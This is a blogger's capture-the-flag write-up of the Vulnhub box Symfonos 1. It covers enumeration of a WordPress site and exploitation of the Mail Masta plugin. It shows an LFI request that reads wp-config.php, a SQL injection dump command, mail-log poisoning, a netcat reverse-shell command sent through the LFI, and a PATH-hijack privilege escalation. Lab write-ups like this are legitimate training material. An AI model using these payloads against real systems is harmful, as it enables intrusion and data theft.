Vulnhub: Symfonos 1
Beginner real life based machine designed to teach a interesting way of obtaining a low priv shell.
This box is on the NetSecFocus Admin list of OSCP-like machines. It’s SYMFONOS: 1 from Vulnhub. I did not complete it without hints; nothing like getting humbled by a ‘beginner’ box to bring you back to earth.
But, it was enlightening, so definitely worth the write up although I will skip over a bit of it.
- 22/tcp open ssh syn-ack ttl 64
- 25/tcp open smtp syn-ack ttl 64
- 80/tcp open http syn-ack ttl 64
- 139/tcp open netbios-ssn syn-ack ttl 64
- 445/tcp open microsoft-ds syn-ack ttl 64
So it’s SSH, SMTP, HTTP and SMB
There are two directories, one with anonymous access and one without. Without gives us hints that get us to the one requiring authentication, which in turn leads to a hidden web directory: /h3l105
The website is a Wordpress site. wpscan gives me no plugins (passive, mixed or aggressive), and just one user: admin. The core version is not known to be vulnerable. I try a password attack with rockyou, but it’s going nowhere.
This is where (after lots of failing) I went looking for a hint. It turns out there is a vulnerable plugin (Mail Masta), which wpscan used to detect but for some reasons doesn’t anymore??
It has two vulns; LFI and SQLi.
With a little encoding trick, I can read wp-config:
GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=/var/www/html/h3l105/wp-config.php HTTP/1.1
But there is no password reuse going on here. There is also no SSH key, and I can’t read the Apache logs.
I use the SQLi to dump the database:
-u 'http://symfonos.local:80/h3l105/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=00+OR+1%3D1&pl=/var/www/html/h3l105//wp-load.php' --dump --cookie='wordpress_test_cookie=WP+Cookie+check'
But I can’t crack the hash. Now what?
This is the real beauty of this box. You can poison the helios account mail with the SMTP service, and use the LFI to get a shell:
Simple. Beautiful. Totally missed it, lol. Shell time:
http:symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc -e /bin/sh 192.168.1.150 1234
The privesc was a binary calling a system binary (curl) without a path; the only odd part about this was that it worked with /bin/sh but not with /bin/bash. That is, it would set the euid correctly with sh, but not bash. Other than that it was not unusual.